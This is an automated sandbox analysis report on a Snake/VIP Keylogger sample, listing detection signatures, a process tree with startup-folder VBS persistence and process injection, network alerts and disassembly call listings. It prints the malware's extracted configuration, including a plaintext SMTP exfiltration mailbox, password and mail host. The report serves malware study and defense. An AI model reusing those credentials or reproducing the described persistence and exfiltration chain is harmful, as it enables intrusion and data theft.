Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AHSlIDftf1.exe

Overview

General Information

Sample name:AHSlIDftf1.exe
renamed because original name is a hash value
Original sample name:e66dc1e184e0838c2c811bebc1780a4e17c0e005af799ecfebc4868664b94a0f.exe
Analysis ID:1587865
MD5:6a0297e362831d810a049e0ef860147e
SHA1:0d5d32ca2b5e36fcc209a7fc6ee12efbf3cf572f
SHA256:e66dc1e184e0838c2c811bebc1780a4e17c0e005af799ecfebc4868664b94a0f
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • AHSlIDftf1.exe (PID: 5544 cmdline: "C:\Users\user\Desktop\AHSlIDftf1.exe" MD5: 6A0297E362831D810A049E0EF860147E)
    • Sancerre.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\AHSlIDftf1.exe" MD5: 6A0297E362831D810A049E0EF860147E)
      • RegSvcs.exe (PID: 3328 cmdline: "C:\Users\user\Desktop\AHSlIDftf1.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 3052 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Sancerre.exe (PID: 3244 cmdline: "C:\Users\user\AppData\Local\konked\Sancerre.exe" MD5: 6A0297E362831D810A049E0EF860147E)
      • RegSvcs.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\konked\Sancerre.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@standartasansor.com", "Password": "StA7759*", "Host": "mail.standartasansor.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@standartasansor.com", "Password": "StA7759*", "Host": "mail.standartasansor.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2df1b:$a1: get_encryptedPassword
        • 0x2e238:$a2: get_encryptedUsername
        • 0x2dd2b:$a3: get_timePasswordChanged
        • 0x2de34:$a4: get_passwordField
        • 0x2df31:$a5: set_encryptedPassword
        • 0x2f5dd:$a7: get_logins
        • 0x2f540:$a10: KeyLoggerEventArgs
        • 0x2f1a5:$a11: KeyLoggerEventArgsEventHandler
        00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 30 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.Sancerre.exe.730000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.2.Sancerre.exe.730000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              1.2.Sancerre.exe.730000.1.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                1.2.Sancerre.exe.730000.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  1.2.Sancerre.exe.730000.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2e11b:$a1: get_encryptedPassword
                  • 0x2e438:$a2: get_encryptedUsername
                  • 0x2df2b:$a3: get_timePasswordChanged
                  • 0x2e034:$a4: get_passwordField
                  • 0x2e131:$a5: set_encryptedPassword
                  • 0x2f7dd:$a7: get_logins
                  • 0x2f740:$a10: KeyLoggerEventArgs
                  • 0x2f3a5:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 21 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , ProcessId: 3052, ProcessName: wscript.exe
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 178.210.170.40, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 3328, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49759
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , ProcessId: 3052, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\konked\Sancerre.exe, ProcessId: 5812, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T18:46:36.756257+010028033053Unknown Traffic192.168.2.449732104.21.64.1443TCP
                  2025-01-10T18:46:38.042437+010028033053Unknown Traffic192.168.2.449734104.21.64.1443TCP
                  2025-01-10T18:46:40.664480+010028033053Unknown Traffic192.168.2.449738104.21.64.1443TCP
                  2025-01-10T18:46:51.865598+010028033053Unknown Traffic192.168.2.449756104.21.64.1443TCP
                  2025-01-10T18:46:53.603779+010028033053Unknown Traffic192.168.2.449758104.21.64.1443TCP
                  2025-01-10T18:46:56.318091+010028033053Unknown Traffic192.168.2.449763104.21.64.1443TCP
                  2025-01-10T18:46:58.931382+010028033053Unknown Traffic192.168.2.449767104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T18:46:34.936633+010028032742Potentially Bad Traffic192.168.2.449730193.122.6.16880TCP
                  2025-01-10T18:46:36.155345+010028032742Potentially Bad Traffic192.168.2.449730193.122.6.16880TCP
                  2025-01-10T18:46:37.467754+010028032742Potentially Bad Traffic192.168.2.449733193.122.6.16880TCP
                  2025-01-10T18:46:38.734359+010028032742Potentially Bad Traffic192.168.2.449735193.122.6.16880TCP
                  2025-01-10T18:46:41.389629+010028032742Potentially Bad Traffic192.168.2.449739193.122.6.16880TCP
                  2025-01-10T18:46:42.717746+010028032742Potentially Bad Traffic192.168.2.449741193.122.6.16880TCP
                  2025-01-10T18:46:50.327134+010028032742Potentially Bad Traffic192.168.2.449754193.122.6.16880TCP
                  2025-01-10T18:46:51.280272+010028032742Potentially Bad Traffic192.168.2.449754193.122.6.16880TCP
                  2025-01-10T18:46:52.702279+010028032742Potentially Bad Traffic192.168.2.449757193.122.6.16880TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T18:46:47.029383+010018100071Potentially Bad Traffic192.168.2.449751149.154.167.220443TCP
                  2025-01-10T18:47:02.653410+010018100071Potentially Bad Traffic192.168.2.449772149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@standartasansor.com", "Password": "StA7759*", "Host": "mail.standartasansor.com", "Port": "587", "Version": "4.4"}
                  Source: 1.2.Sancerre.exe.730000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@standartasansor.com", "Password": "StA7759*", "Host": "mail.standartasansor.com", "Port": "587", "Version": "4.4"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeReversingLabs: Detection: 73%
                  Multi AV Scanner detection for submitted file
                  Source: AHSlIDftf1.exeVirustotal: Detection: 70%Perma Link
                  Source: AHSlIDftf1.exeReversingLabs: Detection: 73%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: AHSlIDftf1.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: AHSlIDftf1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49731 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49755 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: Sancerre.exe, 00000001.00000003.1764694364.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000001.00000003.1765322342.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1917758127.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1918092494.0000000003D10000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: Sancerre.exe, 00000001.00000003.1764694364.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000001.00000003.1765322342.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1917758127.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1918092494.0000000003D10000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00DBDBBE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC68EE FindFirstFileW,FindClose,0_2_00DC68EE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DC698F
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DBD076
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DBD3A9
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DC9642
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DC979D
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DC9B2B
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DC5C97
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_005DDBBE
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E68EE FindFirstFileW,FindClose,1_2_005E68EE
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_005E698F
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005DD076
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005DD3A9
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005E9642
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005E979D
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_005E9B2B
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E5C97 FindFirstFileW,FindNextFileW,FindClose,1_2_005E5C97
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00CEF45Dh2_2_00CEF2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00CEF45Dh2_2_00CEF4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00CEFC19h2_2_00CEF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051331E0h2_2_05132DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05132C19h2_2_05132968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05130D0Dh2_2_05130B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05131697h2_2_05130B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513D7F9h2_2_0513D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051331E0h2_2_05132DC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513CF49h2_2_0513CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513F209h2_2_0513EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513E0A9h2_2_0513DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_05130673
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513E959h2_2_0513E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051331E0h2_2_0513310E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513DC51h2_2_0513D9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513FAB9h2_2_0513F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_05130853
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_05130040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513D3A1h2_2_0513D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513EDB1h2_2_0513EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513F661h2_2_0513F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0513E501h2_2_0513E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05157EB5h2_2_05157B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05159280h2_2_05158FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515C826h2_2_0515C558
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05150FF1h2_2_05150D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515E816h2_2_0515E548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05151449h2_2_051511A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515ECA6h2_2_0515E9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051518A1h2_2_051515F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515CCB6h2_2_0515C9E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051532B1h2_2_05153008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051562D9h2_2_05156030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515BF06h2_2_0515BC38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515DEF6h2_2_0515DC28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051502E9h2_2_05150040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05153709h2_2_05153460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05150741h2_2_05150498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esp, ebp2_2_0515B081
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05156733h2_2_05156488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515E386h2_2_0515E0B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515C396h2_2_0515C0C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05150B99h2_2_051508F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515B5E6h2_2_0515B318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051525A9h2_2_05152300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515D5D6h2_2_0515D308
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051579C9h2_2_05157720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051555D1h2_2_05155328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05152A01h2_2_05152758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515DA66h2_2_0515D798
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05155A29h2_2_05155780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515FA56h2_2_0515F788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05152E59h2_2_05152BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515BA76h2_2_0515B7A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05155E81h2_2_05155BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05156CC1h2_2_05156A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 051548C9h2_2_05154620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05151CF9h2_2_05151A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05157119h2_2_05156E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05154D21h2_2_05154A78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515D146h2_2_0515CE78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515F136h2_2_0515EE68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05152151h2_2_05151EA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05155179h2_2_05154ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05157571h2_2_051572C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0515F5C6h2_2_0515F2F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0123F45Dh8_2_0123F2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0123F45Dh8_2_0123F4AC
